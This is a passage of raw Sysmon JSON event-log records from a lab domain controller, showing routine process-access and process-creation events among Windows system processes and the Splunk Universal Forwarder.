06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.255\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.255","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.278\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001031620300}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.278","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001031620300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001031620300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001031620300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001031620300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001031620300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 